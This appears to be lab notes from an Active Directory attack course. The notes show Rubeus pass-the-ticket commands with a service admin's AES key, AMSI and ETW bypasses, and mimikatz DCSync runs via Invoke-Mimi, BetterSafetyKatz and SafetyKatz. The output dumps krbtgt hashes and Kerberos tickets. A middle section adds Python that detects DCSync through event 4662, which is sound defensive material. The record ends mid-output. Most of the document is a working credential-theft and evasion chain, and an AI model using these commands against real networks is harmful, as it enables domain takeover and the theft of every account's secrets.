[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0xcad172
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/27/2024 4:13:52 AM
EndTime : 6/27/2024 2:13:52 PM
RenewTill : 7/4/2024 4:13:52 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : jWUpQfgQMtCaBUE7Cn23GxbwIOmAtlnd+eKEVow8CPY=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new command prompt opens with Domain Administrator (svcadmin) privileges. We will now execute
the DCSync attack.

Using Invoke-Mimi
We will execute the following commands in the new command prompt.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\Invoke-MimiEx.ps1
PS C:\Windows\system32> Invoke-Mimi -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::dcsync /user:dcorp\krbtgt


[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt


** SAM ACCOUNT **

SAM Username : krbtgt


Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502

Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 a0e60e247b498de4cacfac3ba615af01
02 86615bb9bf7e3c731ba1cb47aa89cf6d
03 637dfb61467fdb4f176fe844fd260bac
04 a0e60e247b498de4cacfac3ba615af01
05 86615bb9bf7e3c731ba1cb47aa89cf6d
06 d2874f937df1fd2b05f528c6e715ac7a
07 a0e60e247b498de4cacfac3ba615af01
08 e8ddc0d55ac23e847837791743b89d22
09 e8ddc0d55ac23e847837791743b89d22
10 5c324b8ab38cfca7542d5befb9849fd9
11 f84dfb60f743b1368ea571504e34863a
12 e8ddc0d55ac23e847837791743b89d22
13 2281b35faded13ae4d78e33a1ef26933
14 f84dfb60f743b1368ea571504e34863a
15 d9ef5ed74ef473e89a570a10a706813e
16 d9ef5ed74ef473e89a570a10a706813e
17 87c75daa20ad259a6f783d61602086aa
18 f0016c07fcff7d479633e8998c75bcf7
19 7c4e5eb0d5d517f945cf22d74fec380e
20 cb97816ac064a567fe37e8e8c863f2a7
21 5adaa49a00f2803658c71f617031b385
22 5adaa49a00f2803658c71f617031b385
23 6d86f0be7751c8607e4b47912115bef2
24 caa61bbf6b9c871af646935febf86b95
25 caa61bbf6b9c871af646935febf86b95
26 5d8e8f8f63b3bb6dd48db5d0352c194c
27 3e139d350a9063db51226cfab9e42aa1
28 d745c0538c8fd103d71229b017a987ce
29 40b43724fa76e22b0d610d656fb49ddd
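What the DC records while this runs is the detection hook. When "Audit Directory Service Access" is enabled and the domain object's SACL audits the replication rights, each DCSync request produces Security event 4662 on the DC, with the control-access GUIDs of the replication rights in its Properties field. Legitimate replication is requested by DC computer accounts, so the same GUIDs requested by any other account are the signal. The following added example (not from the lab notes) runs that rule over constructed events written in a flattened key=value form rather than real EVTX/XML; the DC allow-list is built from the lab's DC name and would come from AD in practice.

```python
import re

# Control-access-right GUIDs that appear in the Properties field of event 4662
# when a principal requests directory replication.
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Accounts that replicate legitimately: the DC computer accounts (constructed from the lab).
DC_ACCOUNTS = {"DCORP-DC$"}

_GUID = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")

# Constructed sample events (flattened key=value form, not real 4662 records).
SAMPLE_EVENTS = [
    # DC-to-DC replication: expected, no alert
    "EventID=4662 Computer=dcorp-dc.dollarcorp.moneycorp.local SubjectDomainName=dcorp "
    "SubjectUserName=DCORP-DC$ "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    # A user account requesting Get-Changes-All: this is the DCSync shown above
    "EventID=4662 Computer=dcorp-dc.dollarcorp.moneycorp.local SubjectDomainName=dcorp "
    "SubjectUserName=svcadmin "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    # Ordinary object access with an unrelated (constructed) property GUID: no alert
    "EventID=4662 Computer=dcorp-dc.dollarcorp.moneycorp.local SubjectDomainName=dcorp "
    "SubjectUserName=student163 Properties={deadbeef-0000-4000-8000-000000000001}",
    # A different event ID entirely
    "EventID=4624 Computer=dcorp-dc.dollarcorp.moneycorp.local SubjectUserName=student163",
]


def parse_event(line: str) -> dict:
    """Split 'key=value' tokens; Properties keeps its comma-joined GUID list."""
    return dict(tok.split("=", 1) for tok in line.split() if "=" in tok)


def replication_rights(event: dict) -> set:
    """Names of the replication rights whose GUIDs appear in the event's Properties."""
    guids = _GUID.findall(event.get("Properties", "").lower())
    return {REPL_GUIDS[g] for g in guids if g in REPL_GUIDS}


def detect_dcsync(lines) -> list:
    """One alert per 4662 event in which a non-DC account requested replication rights."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        rights = replication_rights(ev)
        subject = ev.get("SubjectUserName", "")
        if not rights or subject.upper() in DC_ACCOUNTS:
            continue  # no replication right requested, or normal DC-to-DC replication
        alerts.append({
            "subject": f"{ev.get('SubjectDomainName', '')}\\{subject}",
            "dc": ev.get("Computer", ""),
            "rights": sorted(rights),
            # Get-Changes-All is what exposes secrets; Get-Changes alone does not
            "severity": "high" if "DS-Replication-Get-Changes-All" in rights else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS):
        print(alert)
```

Domain Admins are deliberately not on the allow-list: svcadmin is a legitimate administrator, but an administrator's account requesting replication from a workstation is exactly the case above, and replication should only ever originate from DCs. Pairing the alert with the requesting host (the ClientAddress of the matching 4624 logon on the DC) tells the responder where the request came from.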

Using BetterSafetyKatz
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True


[*] Username : NL2FSF84
[*] Domain : K56PH4IX
[*] Password : O81FOKUN
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 5508
[+] LUID : 0x1d1f34

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)


[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 1908532
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0x1d1f34
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/27/2024 8:13:06 AM
EndTime : 6/27/2024 6:13:06 PM
RenewTill : 7/4/2024 8:13:06 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 7zdea1FF/9s1plbSpc+Nc+qbaB51pOFqRYIg81WB9Z0=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new Command Prompt with Domain Administrator privileges opens.


C:\Windows\system32>C:\AD\Tools\Loader.exe -Path "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe"
"lsadump::dcsync /user:dcorp\krbtgt" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe Arguments :
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe" command of "standard"
module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::dcsync /user:dcorp\krbtgt


[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt


Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502

Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 a0e60e247b498de4cacfac3ba615af01
02 86615bb9bf7e3c731ba1cb47aa89cf6d
03 637dfb61467fdb4f176fe844fd260bac
04 a0e60e247b498de4cacfac3ba615af01
05 86615bb9bf7e3c731ba1cb47aa89cf6d
06 d2874f937df1fd2b05f528c6e715ac7a
07 a0e60e247b498de4cacfac3ba615af01
08 e8ddc0d55ac23e847837791743b89d22
09 e8ddc0d55ac23e847837791743b89d22
10 5c324b8ab38cfca7542d5befb9849fd9
11 f84dfb60f743b1368ea571504e34863a
12 e8ddc0d55ac23e847837791743b89d22
13 2281b35faded13ae4d78e33a1ef26933
14 f84dfb60f743b1368ea571504e34863a
15 d9ef5ed74ef473e89a570a10a706813e
16 d9ef5ed74ef473e89a570a10a706813e
17 87c75daa20ad259a6f783d61602086aa
18 f0016c07fcff7d479633e8998c75bcf7
19 7c4e5eb0d5d517f945cf22d74fec380e
20 cb97816ac064a567fe37e8e8c863f2a7
21 5adaa49a00f2803658c71f617031b385
22 5adaa49a00f2803658c71f617031b385
23 6d86f0be7751c8607e4b47912115bef2
24 caa61bbf6b9c871af646935febf86b95
25 caa61bbf6b9c871af646935febf86b95
26 5d8e8f8f63b3bb6dd48db5d0352c194c
27 3e139d350a9063db51226cfab9e42aa1
28 d745c0538c8fd103d71229b017a987ce
29 40b43724fa76e22b0d610d656fb49ddd

mimikatz(commandline) # exit
Bye!

Using SafetyKatz
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1

[*] Action: Ask TGT

[*] Showing process : True


[*] Username : 09CSYUSB
[*] Domain : 0A6XLNG4
[*] Password : J878WGBV
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4304
[+] LUID : 0x2c84e0

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)


[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 2917600
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0x2c84e0
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/27/2024 9:55:33 AM
EndTime : 6/27/2024 7:55:33 PM
RenewTill : 7/4/2024 9:55:33 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : U4HQ+qXe5C7Yogy7O+lk382AqHA4NVU6HnrEbtVTjrI=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new Command Prompt with Domain Administrator privileges opens.


C:\Windows\system32>C:\AD\Tools\Loader.exe -Path "C:\AD\Tools\Old_Tools\SafetyKatz.exe" "lsadump::dcsync /user:dcorp\krbtgt" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : C:\AD\Tools\Old_Tools\SafetyKatz.exe Arguments :

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
